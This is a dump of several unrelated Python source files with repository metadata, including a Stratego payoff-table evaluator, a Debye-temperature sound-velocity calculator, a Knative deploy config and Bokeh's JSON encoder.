# noqa: B902; handle all db related errors. current_app.logger.error(SAVE_ERROR_MESSAGE.format(account_id, repr(db_exception))) if invoice_id is not None: current_app.logger.info(PAY_REFUND_MESSAGE.format(account_id, invoice_id)) try: payment.cancel_payment(invoice_id) except Exception as cancel_exception: # noqa: B902; log exception current_app.logger.error(PAY_REFUND_ERROR.format(account_id, invoice_id, repr(cancel_exception))) raise db_exception return query.json, HTTPStatus.CREATED def build_staff_payment(req: request, account_id: str): """Extract payment information from request parameters.""" payment_info = { 'transactionType': TransactionTypes.SEARCH_STAFF_NO_FEE.value } if is_bcol_help(account_id): return payment_info certified = req.args.get(CERTIFIED_PARAM) routing_slip = req.args.get(ROUTING_SLIP_PARAM) bcol_number = req.args.get(BCOL_NUMBER_PARAM) dat_number = req.args.get(DAT_NUMBER_PARAM) if certified is not None and isinstance(certified, bool) and certified: payment_info[CERTIFIED_PARAM] = True elif certified is not None and isinstance(certified, str) and \ certified.lower() in ['true', '1', 'y', 'yes']: payment_info[CERTIFIED_PARAM] = True if routing_slip is not None: payment_info[ROUTING_SLIP_PARAM] = str(routing_slip) if bcol_number is not None: payment_info[BCOL_NUMBER_PARAM] = str(bcol_number) if dat_number is not None: payment_info[DAT_NUMBER_PARAM] = str(dat_number) if ROUTING_SLIP_PARAM in payment_info or BCOL_NUMBER_PARAM in payment_info: if CERTIFIED_PARAM in payment_info: payment_info['transactionType'] = TransactionTypes.SEARCH_STAFF_CERTIFIED.value else: payment_info['transactionType'] = TransactionTypes.SEARCH_STAFF.value elif CERTIFIED_PARAM in payment_info: # Verify this is allowed. payment_info['transactionType'] = TransactionTypes.SEARCH_STAFF_CERTIFIED_NO_FEE.value return payment_info def get_payment_details(search_request, search_type): """Extract the payment details value from the search request criteria.""" details = { 'label': TO_SEARCH_TYPE_DESCRIPTION[search_type] } if search_request.search_type == SearchRequest.SearchTypes.BUSINESS_DEBTOR.value: details['value'] = search_request.search_criteria['criteria']['debtorName']['business'] elif search_request.search_type == SearchRequest.SearchTypes.INDIVIDUAL_DEBTOR.value: details['value'] = search_request.search_criteria['criteria']['debtorName']['last'] + ', ' +\ search_request.search_criteria['criteria']['debtorName']['first'] else: details['value'] = search_request.search_criteria['criteria']['value'] return details
0
0
0
a7efbeae0499e8157828f5c76354ddc9e5702563
71
py
Python
airbyte-integrations/connectors/source-smartsheets/source_smartsheets/__init__.py
rajatariya21/airbyte
11e70a7a96e2682b479afbe6f709b9a5fe9c4a8d
[ "MIT" ]
6,215
2020-09-21T13:45:56.000Z
2022-03-31T21:21:45.000Z
airbyte-integrations/connectors/source-smartsheets/source_smartsheets/__init__.py
rajatariya21/airbyte
11e70a7a96e2682b479afbe6f709b9a5fe9c4a8d
[ "MIT" ]
8,448
2020-09-21T00:43:50.000Z
2022-03-31T23:56:06.000Z
airbyte-integrations/connectors/source-smartsheets/source_smartsheets/__init__.py
rajatariya21/airbyte
11e70a7a96e2682b479afbe6f709b9a5fe9c4a8d
[ "MIT" ]
1,251
2020-09-20T05:48:47.000Z
2022-03-31T10:41:29.000Z
from .source import SourceSmartsheets __all__ = ["SourceSmartsheets"]
17.75
37
0.802817
from .source import SourceSmartsheets __all__ = ["SourceSmartsheets"]
0
0
0
0c5b8758ff761fbeb2d01ca908ca3c7ef55e1e5d
8,198
py
Python
multiplayer-rl/mprl/rl/evaluation/payoff_table_gen.py
oslumbers/pipeline-psro
479ca386bf43a99fe7db372ce0017b6d3c4b7949
[ "MIT" ]
26
2020-11-04T13:50:58.000Z
2022-03-11T08:09:00.000Z
multiplayer-rl/mprl/rl/evaluation/payoff_table_gen.py
JBLanier/distributed-rl-for-imperfect-info-games
e150e99e433cadae27aa3ae5f6c7134f7e5c6fda
[ "MIT" ]
null
null
null
multiplayer-rl/mprl/rl/evaluation/payoff_table_gen.py
JBLanier/distributed-rl-for-imperfect-info-games
e150e99e433cadae27aa3ae5f6c7134f7e5c6fda
[ "MIT" ]
13
2020-12-07T11:39:37.000Z
2021-11-04T15:59:17.000Z
from mprl.rl.envs.stratego.stratego_spatial_multiagent_env import SpatialStrategoMultiAgentEnv from progress.bar import Bar import numpy as np import dill from multiprocessing.pool import Pool from multiprocessing import cpu_count
35.489177
138
0.636863
from mprl.rl.envs.stratego.stratego_spatial_multiagent_env import SpatialStrategoMultiAgentEnv from progress.bar import Bar import numpy as np import dill from multiprocessing.pool import Pool from multiprocessing import cpu_count def run_dill_encoded(payload): fun, args = dill.loads(payload) return fun(*args) def apply_async(pool, fun, args): payload = dill.dumps((fun, args)) return pool.apply_async(run_dill_encoded, (payload,)) def _eval_policy_matchup(get_policy_fn_a, get_policy_fn_b, env, stratego_env_config, games_per_matchup): resample_policy_fn_a = False if isinstance(get_policy_fn_a, tuple): get_policy_fn_a, resample_policy_fn_a = get_policy_fn_a policy_a_name, policy_a_get_action_index = get_policy_fn_a(stratego_env_config) resample_policy_fn_b = False if isinstance(get_policy_fn_b, tuple): get_policy_fn_b, resample_policy_fn_b = get_policy_fn_b policy_b_name, policy_b_get_action_index = get_policy_fn_b(stratego_env_config) policy_funcs = [policy_a_get_action_index, policy_b_get_action_index] policy_a_state = None policy_b_state = None policy_states = [policy_a_state, policy_b_state] def policy_index(agent_id): if agent_id == 1: return 0 else: return 1 policy_a_total_return = 0 ties = 0 # with Bar('Evaluating {} vs {}'.format(policy_a_name, policy_b_name), max=games_per_matchup) as bar: for game in range(games_per_matchup): if resample_policy_fn_a: policy_a_get_action_index(None, None, resample=True) if resample_policy_fn_b: policy_b_get_action_index(None, None, resample=True) obs = env.reset() dones = {} infos = {} game_length = 0 while True: if "__all__" in dones: if dones["__all__"]: break game_length += 1 assert len(obs) == 1 acting_agent_id, acting_agent_observation = list(obs.items())[0] acting_policy_fn = policy_funcs[policy_index(acting_agent_id)] acting_policy_state = policy_states[policy_index(acting_agent_id)] action_index, new_policy_state = acting_policy_fn(acting_agent_observation, acting_policy_state) policy_states[policy_index(acting_agent_id)] = new_policy_state obs, rewards, dones, infos = env.step(action_dict={acting_agent_id: action_index}) player_a_won = infos[1]['game_result'] == 'won' tied = infos[1]['game_result'] == 'tied' if player_a_won: policy_a_total_return += 1 elif not tied: policy_a_total_return -= 1 elif tied: ties += 1 # print(f"game length: {game_length}") # bar.next() policy_a_expected_payoff = policy_a_total_return / games_per_matchup tie_percentage = ties / games_per_matchup return policy_a_name, policy_b_name, policy_a_expected_payoff, tie_percentage def generate_payoff_table(get_policy_fn_list, games_per_matchup, stratego_env_config, policies_also_play_against_self=True, return_matrix=False, num_processes=0): env = SpatialStrategoMultiAgentEnv(env_config=stratego_env_config) payoff_table_dict = {} tie_dict = {} results_dict = {} payoff_table_matrix = np.zeros(shape=(len(get_policy_fn_list), len(get_policy_fn_list))) payoff_matrix_i_names = [None] * len(get_policy_fn_list) payoff_matrix_j_names = [None] * len(get_policy_fn_list) if num_processes == 0: num_processes = cpu_count() pool = Pool(processes=num_processes) for i in range(len(get_policy_fn_list)): get_policy_fn_a = get_policy_fn_list[i] if policies_also_play_against_self: j_start = i else: j_start = i + 1 for j in range(j_start, len(get_policy_fn_list)): get_policy_fn_b = get_policy_fn_list[j] res = apply_async(pool, _eval_policy_matchup, (get_policy_fn_a, get_policy_fn_b, env, stratego_env_config, games_per_matchup)) if i not in results_dict: results_dict[i] = {} results_dict[i][j] = res print(f"submitted {i} vs {j}") for i in range(len(get_policy_fn_list)): print("waiting for and processing results now...") if policies_also_play_against_self: j_start = i else: j_start = i + 1 for j in range(j_start, len(get_policy_fn_list)): policy_a_name, policy_b_name, policy_a_expected_payoff, tie_percentage = results_dict[i][j].get() payoff_matrix_i_names[i] = policy_a_name payoff_matrix_j_names[j] = policy_b_name if policy_a_name not in payoff_table_dict: payoff_table_dict[policy_a_name] = {} tie_dict[policy_a_name] = {} payoff_table_dict[policy_a_name][policy_b_name] = policy_a_expected_payoff tie_dict[policy_a_name][policy_b_name] = tie_percentage payoff_table_matrix[i, j] = policy_a_expected_payoff print(f"got {i} ({policy_a_name}) vs {j} ({policy_b_name})") if return_matrix: return payoff_table_dict, tie_dict, payoff_table_matrix, payoff_matrix_i_names return payoff_table_dict, tie_dict def generate_single_player_payoff_table(get_policy_fn_list, play_as_agent_id, games_per_matchup, stratego_env_config, resample_policy_every_game=False): env = SpatialStrategoMultiAgentEnv(env_config=stratego_env_config) payoff_table_dict = {} tie_dict = {} payoff_table_matrix = np.zeros(shape=(len(get_policy_fn_list))) for i in range(len(get_policy_fn_list)): get_policy_fn_a = get_policy_fn_list[i] policy_a_name, policy_a_get_action_index = get_policy_fn_a(stratego_env_config) policy_func = policy_a_get_action_index policy_a_state = None policy_state = policy_a_state policy_a_total_return = 0 ties = 0 with Bar('Evaluating {}'.format(policy_a_name), max=games_per_matchup) as bar: for game in range(games_per_matchup): if resample_policy_every_game: policy_func(None, None, resample=True) obs = env.reset() dones = {} infos = {} # env.base_env.print_fully_observable_board_to_console(state=env.state) while True: if "__all__" in dones: if dones["__all__"]: break assert len(obs) == 1 acting_agent_id, acting_agent_observation = list(obs.items())[0] assert acting_agent_id == play_as_agent_id acting_policy_fn = policy_func acting_policy_state = policy_state action_index, new_policy_state = acting_policy_fn(acting_agent_observation, acting_policy_state) policy_state = new_policy_state obs, rewards, dones, infos = env.step(action_dict={acting_agent_id: action_index}) player_a_won = infos[play_as_agent_id]['game_result'] == 'won' tied = infos[play_as_agent_id]['game_result'] == 'tied' if player_a_won: policy_a_total_return += 1 elif not tied: policy_a_total_return -= 1 elif tied: ties +=1 bar.next() policy_a_expected_payoff = policy_a_total_return / games_per_matchup tie_percentage = ties/games_per_matchup payoff_table_dict[policy_a_name] = policy_a_expected_payoff tie_dict[policy_a_name] = tie_percentage payoff_table_matrix[i] = policy_a_expected_payoff return payoff_table_dict, tie_dict
7,849
0
115
abcc03631da5d5f6c8a14d3e8de962d1222734b2
123
py
Python
backend/todoList/admin.py
crowdbotics-apps/basic-todo-app-28878
c84718ed616ec508eeb948caa78413f964f560b6
[ "FTL", "AML", "RSA-MD" ]
null
null
null
backend/todoList/admin.py
crowdbotics-apps/basic-todo-app-28878
c84718ed616ec508eeb948caa78413f964f560b6
[ "FTL", "AML", "RSA-MD" ]
null
null
null
backend/todoList/admin.py
crowdbotics-apps/basic-todo-app-28878
c84718ed616ec508eeb948caa78413f964f560b6
[ "FTL", "AML", "RSA-MD" ]
null
null
null
from django.contrib import admin from .models import ToDoItem admin.site.register(ToDoItem) # Register your models here.
17.571429
32
0.804878
from django.contrib import admin from .models import ToDoItem admin.site.register(ToDoItem) # Register your models here.
0
0
0
b39943285433efe684d03e8d444f09fad241a11d
439
py
Python
bitirmetezi/venv/Lib/site-packages/where/__main__.py
busraltun/IMPLEMENTATIONOFEYECONTROLLEDVIRTUALKEYBOARD
fa3a9b150419a17aa82f41b068a5d69d0ff0d0f3
[ "MIT" ]
null
null
null
bitirmetezi/venv/Lib/site-packages/where/__main__.py
busraltun/IMPLEMENTATIONOFEYECONTROLLEDVIRTUALKEYBOARD
fa3a9b150419a17aa82f41b068a5d69d0ff0d0f3
[ "MIT" ]
null
null
null
bitirmetezi/venv/Lib/site-packages/where/__main__.py
busraltun/IMPLEMENTATIONOFEYECONTROLLEDVIRTUALKEYBOARD
fa3a9b150419a17aa82f41b068a5d69d0ff0d0f3
[ "MIT" ]
null
null
null
from __future__ import absolute_import import sys import argparse import where if __name__ == "__main__": sys.exit(main())
19.086957
110
0.708428
from __future__ import absolute_import import sys import argparse import where def main(): parser = argparse.ArgumentParser( description="Find the locations of a file in the environment's paths." ) parser.add_argument("filename", type=str, help="The filename to be found") args = parser.parse_args() for result in where.iwhere(args.filename): print(result) if __name__ == "__main__": sys.exit(main())
283
0
23
9c840b83d5f099c8dd509d91b19bea7595c02e13
907
py
Python
rulesets/apps/class-b/on-location-change-notifier-slack/__deploy__.py
airspot-dev/iot-demo
5f8c1877192043f4118b102ad1f71326d40de858
[ "Apache-2.0" ]
1
2021-06-22T10:26:54.000Z
2021-06-22T10:26:54.000Z
rulesets/apps/class-b/on-location-change-notifier-slack/__deploy__.py
airspot-dev/iot-demo
5f8c1877192043f4118b102ad1f71326d40de858
[ "Apache-2.0" ]
null
null
null
rulesets/apps/class-b/on-location-change-notifier-slack/__deploy__.py
airspot-dev/iot-demo
5f8c1877192043f4118b102ad1f71326d40de858
[ "Apache-2.0" ]
1
2021-09-20T11:56:50.000Z
2021-09-20T11:56:50.000Z
name = "on-location-change-notifier-slack" add_files = ( "ruleset.py", ) add_modules = True # find modules in directory (folders having __init__.py file) and add them to container extra_commands = ( # ("RUN", "pip install my-wonderful-lib==1.0"), ) labels = { "networking.knative.dev/visibility": "cluster-local", "krules.airspot.dev/type": "ruleset", "krules.airspot.dev/ruleset": name, "configs.krules.airspot.dev/slack-webhooks": "inject" } template_annotations = { "autoscaling.knative.dev/minScale": "1", } #service_account = "my-service-account" triggers = ( { "name": name, "filter": { "attributes": { "type": "subject-property-changed", "propertyname": "location", } } }, ) triggers_default_broker = "class-b" ksvc_sink = "broker:default" ksvc_procevents_sink = "broker:procevents"
21.093023
107
0.627343
name = "on-location-change-notifier-slack" add_files = ( "ruleset.py", ) add_modules = True # find modules in directory (folders having __init__.py file) and add them to container extra_commands = ( # ("RUN", "pip install my-wonderful-lib==1.0"), ) labels = { "networking.knative.dev/visibility": "cluster-local", "krules.airspot.dev/type": "ruleset", "krules.airspot.dev/ruleset": name, "configs.krules.airspot.dev/slack-webhooks": "inject" } template_annotations = { "autoscaling.knative.dev/minScale": "1", } #service_account = "my-service-account" triggers = ( { "name": name, "filter": { "attributes": { "type": "subject-property-changed", "propertyname": "location", } } }, ) triggers_default_broker = "class-b" ksvc_sink = "broker:default" ksvc_procevents_sink = "broker:procevents"
0
0
0
2dbb7cad82088c634a4e4ad958527162927d1e63
4,171
py
Python
qmpy/analysis/debye/sound_waves.py
JosephMontoya-TRI/qmpy
5a5aa7b25b1231801969ea042bbd2309cacc7859
[ "MIT" ]
1
2019-11-15T20:54:04.000Z
2019-11-15T20:54:04.000Z
qmpy/analysis/debye/sound_waves.py
JosephMontoya-TRI/qmpy_py3
5a5aa7b25b1231801969ea042bbd2309cacc7859
[ "MIT" ]
null
null
null
qmpy/analysis/debye/sound_waves.py
JosephMontoya-TRI/qmpy_py3
5a5aa7b25b1231801969ea042bbd2309cacc7859
[ "MIT" ]
null
null
null
#!/usr/bin/python # sound_waves.py v1.1 12-3-2011 Jeff Doak jeff.w.doak@gmail.com import sys import scipy as sp from scipy import linalg from scipy.integrate import dblquad import read_file BOLTZCONST = 1.381e-23 # J/K PLANCKCONST = 6.626e-34 # J*s AVONUM = 6.022e23 # things/mol def dir_cosines(dir,coords=sp.identity(3)): """Returns a vector containing the direction cosines between vector dir, and the coordinate system coords. Default coordinate system is an orthonormal cartesian coordinate system.""" cosines = sp.dot(coords,dir)/linalg.norm(dir) return cosines def make_gamma(dc,C): """ Returns a matrix containing the modified set of elastic constants, C, transformed by the direction cosines, dc. """ Gamma = sp.zeros((3,3)) Gamma[0,0] = dc[0]**2*C[0,0]+dc[1]**2*C[5,5]+dc[2]**2*C[4,4] Gamma[0,0] += 2*dc[1]*dc[2]*C[4,5]+2*dc[2]*dc[0]*C[0,4] Gamma[0,0] += 2*dc[0]*dc[1]*C[0,5] Gamma[1,1] = dc[0]**2*C[5,5]+dc[1]**2*C[1,1]+dc[2]**2*C[3,3] Gamma[1,1] += 2*dc[1]*dc[2]*C[1,3]+2*dc[2]*dc[0]*C[3,5] Gamma[1,1] += 2*dc[0]*dc[1]*C[1,5] Gamma[2,2] = dc[0]**2*C[4,4]+dc[1]**2*C[3,3]+dc[2]**2*C[2,2] Gamma[2,2] += 2*dc[1]*dc[2]*C[2,3]+2*dc[2]*dc[0]*C[2,4] Gamma[2,2] += 2*dc[0]*dc[1]*C[3,4] Gamma[0,1] = dc[0]**2*C[0,5]+dc[1]**2*C[1,5]+dc[2]**2*C[3,4] Gamma[0,1] += dc[1]*dc[2]*(C[3,5]+C[1,4])+dc[2]*dc[0]*(C[0,3]+C[4,5]) Gamma[0,1] += dc[0]*dc[1]*(C[0,1]+C[5,5]) Gamma[0,2] = dc[0]**2*C[0,4]+dc[1]**2*C[3,5]+dc[2]**2*C[2,4] Gamma[0,2] += dc[1]*dc[2]*(C[3,4]+C[2,5])+dc[2]*dc[0]*(C[0,2]+C[4,4]) Gamma[0,2] += dc[0]*dc[1]*(C[0,3]+C[4,5]) Gamma[1,2] = dc[0]**2*C[4,5]+dc[1]**2*C[1,3]+dc[2]**2*C[2,3] Gamma[1,2] += dc[1]*dc[2]*(C[3,3]+C[1,2])+dc[2]*dc[0]*(C[2,5]+C[3,4]) Gamma[1,2] += dc[0]*dc[1]*(C[1,4]+C[3,5]) Gamma[1,0] = Gamma[0,1] Gamma[2,0] = Gamma[0,2] Gamma[2,1] = Gamma[1,2] return Gamma def spherical_integral(C,rho): """ Calculate the integral of a function over a unit sphere. """ # phi - azimuthal angle (angle in xy-plane) # theta - polar angle (angle between z and xy-plane) # ( y , x ) # ( y , x ) #def sfunc(theta,phi,args=()): # return func(theta,phi,args)*sp.sin(theta) integral,error = dblquad(func,0,2*sp.pi,lambda g: 0,lambda h: sp.pi,args=(C,rho)) return integral #direction = sp.array((1.0,1.0,1.0)) #dc = dir_cosines(direction) #C = read_file.read_file(sys.argv[1]) #C.pop(0) #C = sp.array(C,float) #Gamma = make_gamma(dc,C) #density = 7500 #kg/m**3 #density = float(read_file.read_file(sys.argv[2])[0][0]) #rho_c_square = linalg.eigvals(Gamma) #GPa #rho_c_square = rho_c_square*1e9 #Pa #sound_vel = sp.sqrt(rho_c_square/density).real #avg_vel = sp.average(sound_vel) #print Gamma #print direction #print C #print rho_c_square #print rho_c_square.real #print sound_vel," in m/s" #print avg_vel #print spherical_integral(C,density) if __name__ == "__main__": main(sys.argv[1:])
33.368
83
0.587389
#!/usr/bin/python # sound_waves.py v1.1 12-3-2011 Jeff Doak jeff.w.doak@gmail.com import sys import scipy as sp from scipy import linalg from scipy.integrate import dblquad import read_file BOLTZCONST = 1.381e-23 # J/K PLANCKCONST = 6.626e-34 # J*s AVONUM = 6.022e23 # things/mol def dir_cosines(dir,coords=sp.identity(3)): """Returns a vector containing the direction cosines between vector dir, and the coordinate system coords. Default coordinate system is an orthonormal cartesian coordinate system.""" cosines = sp.dot(coords,dir)/linalg.norm(dir) return cosines def make_gamma(dc,C): """ Returns a matrix containing the modified set of elastic constants, C, transformed by the direction cosines, dc. """ Gamma = sp.zeros((3,3)) Gamma[0,0] = dc[0]**2*C[0,0]+dc[1]**2*C[5,5]+dc[2]**2*C[4,4] Gamma[0,0] += 2*dc[1]*dc[2]*C[4,5]+2*dc[2]*dc[0]*C[0,4] Gamma[0,0] += 2*dc[0]*dc[1]*C[0,5] Gamma[1,1] = dc[0]**2*C[5,5]+dc[1]**2*C[1,1]+dc[2]**2*C[3,3] Gamma[1,1] += 2*dc[1]*dc[2]*C[1,3]+2*dc[2]*dc[0]*C[3,5] Gamma[1,1] += 2*dc[0]*dc[1]*C[1,5] Gamma[2,2] = dc[0]**2*C[4,4]+dc[1]**2*C[3,3]+dc[2]**2*C[2,2] Gamma[2,2] += 2*dc[1]*dc[2]*C[2,3]+2*dc[2]*dc[0]*C[2,4] Gamma[2,2] += 2*dc[0]*dc[1]*C[3,4] Gamma[0,1] = dc[0]**2*C[0,5]+dc[1]**2*C[1,5]+dc[2]**2*C[3,4] Gamma[0,1] += dc[1]*dc[2]*(C[3,5]+C[1,4])+dc[2]*dc[0]*(C[0,3]+C[4,5]) Gamma[0,1] += dc[0]*dc[1]*(C[0,1]+C[5,5]) Gamma[0,2] = dc[0]**2*C[0,4]+dc[1]**2*C[3,5]+dc[2]**2*C[2,4] Gamma[0,2] += dc[1]*dc[2]*(C[3,4]+C[2,5])+dc[2]*dc[0]*(C[0,2]+C[4,4]) Gamma[0,2] += dc[0]*dc[1]*(C[0,3]+C[4,5]) Gamma[1,2] = dc[0]**2*C[4,5]+dc[1]**2*C[1,3]+dc[2]**2*C[2,3] Gamma[1,2] += dc[1]*dc[2]*(C[3,3]+C[1,2])+dc[2]*dc[0]*(C[2,5]+C[3,4]) Gamma[1,2] += dc[0]*dc[1]*(C[1,4]+C[3,5]) Gamma[1,0] = Gamma[0,1] Gamma[2,0] = Gamma[0,2] Gamma[2,1] = Gamma[1,2] return Gamma def spherical_integral(C,rho): """ Calculate the integral of a function over a unit sphere. """ # phi - azimuthal angle (angle in xy-plane) # theta - polar angle (angle between z and xy-plane) # ( y , x ) def func(theta,phi,C,rho): # Test function. Can I get 4*pi^2???? x = sp.cos(phi)*sp.sin(theta) y = sp.sin(phi)*sp.sin(theta) z = sp.cos(theta) #dir = sp.array((x,y,z)) #dc = dir_cosines(dir) dc = sp.array((x,y,z)) # Turns out these are direction cosines! Gamma = make_gamma(dc,C) rho_c_square = linalg.eigvals(Gamma).real # GPa rho_c_square = rho_c_square*1e9 # Pa sound_vel = sp.sqrt(rho_c_square/rho) # m/s integrand = 1/(sound_vel[0]**3) + 1/(sound_vel[1]**3) + 1/(sound_vel[2]**3) return integrand*sp.sin(theta) # ( y , x ) #def sfunc(theta,phi,args=()): # return func(theta,phi,args)*sp.sin(theta) integral,error = dblquad(func,0,2*sp.pi,lambda g: 0,lambda h: sp.pi,args=(C,rho)) return integral #direction = sp.array((1.0,1.0,1.0)) #dc = dir_cosines(direction) #C = read_file.read_file(sys.argv[1]) #C.pop(0) #C = sp.array(C,float) #Gamma = make_gamma(dc,C) #density = 7500 #kg/m**3 #density = float(read_file.read_file(sys.argv[2])[0][0]) #rho_c_square = linalg.eigvals(Gamma) #GPa #rho_c_square = rho_c_square*1e9 #Pa #sound_vel = sp.sqrt(rho_c_square/density).real #avg_vel = sp.average(sound_vel) #print Gamma #print direction #print C #print rho_c_square #print rho_c_square.real #print sound_vel," in m/s" #print avg_vel #print spherical_integral(C,density) def main(argv): C = read_file.read_file(argv[0]) C.pop(0) C = sp.array(C,float) density,natoms,molmass = read_file.read_file(argv[1])[0] density = float(density) # kg/m**3 natoms = int(natoms) molmass = float(molmass) # kg/mol integral = spherical_integral(C,density) # (s/m)**3 mean_vel = (integral/12./sp.pi)**(-1/3.) debeye_temp = PLANCKCONST/BOLTZCONST*(3.*natoms*AVONUM* density/4./sp.pi/molmass)**(1/3.)*mean_vel print(debeye_temp,mean_vel) if __name__ == "__main__": main(sys.argv[1:])
1,089
0
49
c5b7670fef4ed19a20f598574ac6006d29d5300e
6,275
py
Python
bokeh/core/json_encoder.py
teresafds/bokeh
95b2a74ff463cfabdf9e3390951fa380166e6691
[ "BSD-3-Clause" ]
null
null
null
bokeh/core/json_encoder.py
teresafds/bokeh
95b2a74ff463cfabdf9e3390951fa380166e6691
[ "BSD-3-Clause" ]
null
null
null
bokeh/core/json_encoder.py
teresafds/bokeh
95b2a74ff463cfabdf9e3390951fa380166e6691
[ "BSD-3-Clause" ]
null
null
null
#----------------------------------------------------------------------------- # Copyright (c) 2012 - 2022, Anaconda, Inc., and Bokeh Contributors. # All rights reserved. # # The full license is in the file LICENSE.txt, distributed with this software. #----------------------------------------------------------------------------- ''' Provide a functions and classes to implement a custom JSON encoder for serializing objects for BokehJS. In general, functions in this module convert values in the following way: * Datetime values (Python, Pandas, NumPy) are converted to floating point milliseconds since epoch. * TimeDelta values are converted to absolute floating point milliseconds. * RelativeDelta values are converted to dictionaries. * Decimal values are converted to floating point. * Sequences (Pandas Series, NumPy arrays, python sequences) that are passed though this interface are converted to lists. Note, however, that arrays in data sources inside Bokeh Documents are converted elsewhere, and by default use a binary encoded format. * Bokeh ``Model`` instances are usually serialized elsewhere in the context of an entire Bokeh Document. Models passed trough this interface are converted to references. * ``HasProps`` (that are not Bokeh models) are converted to key/value dicts or all their properties and values. * ``Color`` instances are converted to CSS color values. .. |serialize_json| replace:: :class:`~bokeh.core.json_encoder.serialize_json` ''' #----------------------------------------------------------------------------- # Boilerplate #----------------------------------------------------------------------------- from __future__ import annotations import logging # isort:skip log = logging.getLogger(__name__) #----------------------------------------------------------------------------- # Imports #----------------------------------------------------------------------------- # Standard library imports from json import JSONEncoder from typing import Any, List, Tuple # Bokeh imports from ..settings import settings from .serialization import Buffer, Serialized #----------------------------------------------------------------------------- # Globals and constants #----------------------------------------------------------------------------- __all__ = ( 'serialize_json', ) #----------------------------------------------------------------------------- # General API #----------------------------------------------------------------------------- def serialize_json(obj: Any | Serialized[Any], *, pretty: bool | None = None, indent: int | None = None) -> str: ''' Return a serialized JSON representation of objects, suitable to send to BokehJS. This function is typically used to serialize single python objects in the manner expected by BokehJS. In particular, many datetime values are automatically normalized to an expected format. Some Bokeh objects can also be passed, but note that Bokeh models are typically properly serialized in the context of an entire Bokeh document. The resulting JSON always has sorted keys. By default. the output is as compact as possible unless pretty output or indentation is requested. Args: obj (obj) : the object to serialize to JSON format pretty (bool, optional) : Whether to generate prettified output. If ``True``, spaces are added after added after separators, and indentation and newlines are applied. (default: False) Pretty output can also be enabled with the environment variable ``BOKEH_PRETTY``, which overrides this argument, if set. indent (int or None, optional) : Amount of indentation to use in generated JSON output. If ``None`` then no indentation is used, unless pretty output is enabled, in which case two spaces are used. (default: None) Any additional keyword arguments are passed to ``json.dumps``, except for some that are computed internally, and cannot be overridden: * allow_nan * indent * separators * sort_keys Examples: .. code-block:: python >>> data = dict(b=np.datetime64('2017-01-01'), a = np.arange(3)) >>>print(serialize_json(data)) {"a":[0,1,2],"b":1483228800000.0} >>> print(serialize_json(data, pretty=True)) { "a": [ 0, 1, 2 ], "b": 1483228800000.0 } ''' pretty = settings.pretty(pretty) if pretty: separators=(",", ": ") else: separators=(",", ":") if pretty and indent is None: indent = 2 content: Any buffers: List[Buffer] if isinstance(obj, Serialized): content = obj.content buffers = obj.buffers or [] else: content = obj buffers = [] encoder = PayloadEncoder(buffers=buffers, indent=indent, separators=separators) return encoder.encode(content) #----------------------------------------------------------------------------- # Dev API #----------------------------------------------------------------------------- #----------------------------------------------------------------------------- # Private API #----------------------------------------------------------------------------- #----------------------------------------------------------------------------- # Code #-----------------------------------------------------------------------------
35.055866
112
0.530837
#----------------------------------------------------------------------------- # Copyright (c) 2012 - 2022, Anaconda, Inc., and Bokeh Contributors. # All rights reserved. # # The full license is in the file LICENSE.txt, distributed with this software. #----------------------------------------------------------------------------- ''' Provide a functions and classes to implement a custom JSON encoder for serializing objects for BokehJS. In general, functions in this module convert values in the following way: * Datetime values (Python, Pandas, NumPy) are converted to floating point milliseconds since epoch. * TimeDelta values are converted to absolute floating point milliseconds. * RelativeDelta values are converted to dictionaries. * Decimal values are converted to floating point. * Sequences (Pandas Series, NumPy arrays, python sequences) that are passed though this interface are converted to lists. Note, however, that arrays in data sources inside Bokeh Documents are converted elsewhere, and by default use a binary encoded format. * Bokeh ``Model`` instances are usually serialized elsewhere in the context of an entire Bokeh Document. Models passed trough this interface are converted to references. * ``HasProps`` (that are not Bokeh models) are converted to key/value dicts or all their properties and values. * ``Color`` instances are converted to CSS color values. .. |serialize_json| replace:: :class:`~bokeh.core.json_encoder.serialize_json` ''' #----------------------------------------------------------------------------- # Boilerplate #----------------------------------------------------------------------------- from __future__ import annotations import logging # isort:skip log = logging.getLogger(__name__) #----------------------------------------------------------------------------- # Imports #----------------------------------------------------------------------------- # Standard library imports from json import JSONEncoder from typing import Any, List, Tuple # Bokeh imports from ..settings import settings from .serialization import Buffer, Serialized #----------------------------------------------------------------------------- # Globals and constants #----------------------------------------------------------------------------- __all__ = ( 'serialize_json', ) #----------------------------------------------------------------------------- # General API #----------------------------------------------------------------------------- def serialize_json(obj: Any | Serialized[Any], *, pretty: bool | None = None, indent: int | None = None) -> str: ''' Return a serialized JSON representation of objects, suitable to send to BokehJS. This function is typically used to serialize single python objects in the manner expected by BokehJS. In particular, many datetime values are automatically normalized to an expected format. Some Bokeh objects can also be passed, but note that Bokeh models are typically properly serialized in the context of an entire Bokeh document. The resulting JSON always has sorted keys. By default. the output is as compact as possible unless pretty output or indentation is requested. Args: obj (obj) : the object to serialize to JSON format pretty (bool, optional) : Whether to generate prettified output. If ``True``, spaces are added after added after separators, and indentation and newlines are applied. (default: False) Pretty output can also be enabled with the environment variable ``BOKEH_PRETTY``, which overrides this argument, if set. indent (int or None, optional) : Amount of indentation to use in generated JSON output. If ``None`` then no indentation is used, unless pretty output is enabled, in which case two spaces are used. (default: None) Any additional keyword arguments are passed to ``json.dumps``, except for some that are computed internally, and cannot be overridden: * allow_nan * indent * separators * sort_keys Examples: .. code-block:: python >>> data = dict(b=np.datetime64('2017-01-01'), a = np.arange(3)) >>>print(serialize_json(data)) {"a":[0,1,2],"b":1483228800000.0} >>> print(serialize_json(data, pretty=True)) { "a": [ 0, 1, 2 ], "b": 1483228800000.0 } ''' pretty = settings.pretty(pretty) if pretty: separators=(",", ": ") else: separators=(",", ":") if pretty and indent is None: indent = 2 content: Any buffers: List[Buffer] if isinstance(obj, Serialized): content = obj.content buffers = obj.buffers or [] else: content = obj buffers = [] encoder = PayloadEncoder(buffers=buffers, indent=indent, separators=separators) return encoder.encode(content) #----------------------------------------------------------------------------- # Dev API #----------------------------------------------------------------------------- class PayloadEncoder(JSONEncoder): def __init__(self, *, buffers: List[Buffer] = [], threshold: int = 100, indent: int | None = None, separators: Tuple[str, str] | None = None): super().__init__(sort_keys=False, allow_nan=False, indent=indent, separators=separators) self._buffers = {buf.id: buf for buf in buffers} self._threshold = threshold def default(self, obj: Any) -> Any: if isinstance(obj, Buffer): if obj.id in self._buffers: # TODO: and len(obj.data) > self._threshold: return obj.ref else: return obj.to_base64() else: return super().default(obj) #----------------------------------------------------------------------------- # Private API #----------------------------------------------------------------------------- #----------------------------------------------------------------------------- # Code 